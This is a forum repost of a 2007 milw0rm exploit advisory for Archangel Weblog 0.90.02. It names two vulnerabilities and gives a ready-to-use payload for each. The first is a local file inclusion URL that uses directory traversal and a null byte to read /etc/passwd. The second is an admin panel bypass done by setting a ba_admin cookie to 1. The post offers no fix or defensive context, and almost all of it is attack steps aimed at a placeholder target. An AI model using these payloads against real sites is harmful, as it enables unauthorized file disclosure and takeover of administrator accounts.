Jump to content
Ras

Archangel Weblog 0.90.02 LFI / Admin Bypass Vulns

Recommended Posts

Posted
                      \\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Portal : Archangel Weblog version 0.90.02
Home : [url]http://www.archangelmgt.com/weblog.shtml[/url]
Download : [url]http://www.archangelmgt.com/Archangel_Weblog_v090_02.zip[/url]
Author : Dj7xpl / [email]Dj7xpl@2600.ir[/email]
HomePage : [url]http://Dj7xpl.2600.ir[/url]
Type : Local File Inclusion & Login Page Bypass By Cookie
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/



+---------------------------------------------------------------------------------------------+

Local File Include :

[url]http://[TARGET]/[/url][PATH]/index.php?index=[Local File]%00
[url]http://Target.com/blog/index.php?index=../../../../etc/passwd%00[/url]

+---------------------------------------------------------------------------------------------+


+---------------------------------------------------------------------------------------------+

Edit Cookie :

Host : Target
Name : ba_admin
Value : 1 <------ (Admin User Id)

And Go To Admin Panel :

[url]http://[Target]/[/url][Path]/Admin/

+---------------------------------------------------------------------------------------------+

# milw0rm.com [2007-05-05]

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...